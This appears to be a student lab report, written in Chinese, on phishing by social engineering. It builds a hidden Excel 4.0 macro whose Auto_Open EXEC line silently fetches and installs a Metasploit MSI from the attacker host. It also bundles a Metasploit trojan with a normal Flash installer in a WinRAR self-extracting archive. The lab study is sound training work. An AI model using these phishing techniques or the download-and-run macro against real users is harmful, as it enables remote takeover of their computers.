一、实验目的
1、通过模拟社会工程学攻击,深入理解其原理和方法;
2、了解并掌握社会工程学攻击的常见手段和技巧;
3、掌握钓鱼样本制作的方法。
二、实验任务
1、制作恶意的excel钓鱼样本;
2、制作正常软件和恶意木马进行捆绑打包钓鱼样本。
三、实验环境
1、靶机地址:192.168.159.138
2、攻击机地址:192.168.159.128
四、实验过程和实验结果
(一)Excel宏
1. msf生成恶意的msi文件
2.msf建立监听
3. python在具有恶意的msi的文件夹下开启http服务
4. 开始制作excel
(1)打开Excel,在底部sheet1右键选择插入
(2)选择MS Excel 4.0宏表
(3)输入内容
第一行输入=EXEC("msiexec /q /i http://192.168.159.128/document1st.msi")表示调用服务器上的msi
第二行输入=HALT(),标识Excel 4.0宏结束
第一格,左上角的A1模式手动输入:Auto_Open,Enter回车
(4)右键底部宏1,隐藏宏
(5)另存为选择Excel 启用宏的工作簿, 后缀为.xlsm。现在桌面上.xlsm 就是伪装过的木马
(6)打开后提示宏已经被禁用,启用后就可以在kali上发现连接上了
(二)常规软件捆绑远控木马进行钓鱼
1. 制作msf木马
2.利用python,在含有木马的文件下开启http服务让靶机下载木马
3.在靶机下载木马
4.给靶机安装winrar,下载正常的flash
5. 选中木马和正常的flash一起压缩,完成所有步骤点击确定
6.启动msf监听
7.双击运行自解压格式,返回kali发现已经成功连接
五、实验总结
通过Excel宏实验我了解到Excel宏可以制作恶意文件,用户打开Excel文件,文件里的宏就会被触发,然后拿到对方电脑权限,并进行控制。在这次实验中,开启http服务时,因为没有在有msi的文件下开启,导致连接不成功。有了Excel宏实验的经验,在做常规软件捆绑远控木马进行钓鱼的实验时就很轻松了。
本次实验原理运用了社会工程学攻击,社会工程学攻击是指诱使网络用户在线执行某些危险操作,它利用人性弱点获取目标系统有价值信息,当缺乏目标系统可用信息时,该方法是渗透测试者重要手段之一。社会工程学攻击者通常利用这一特点,获取机密信息或访问数据。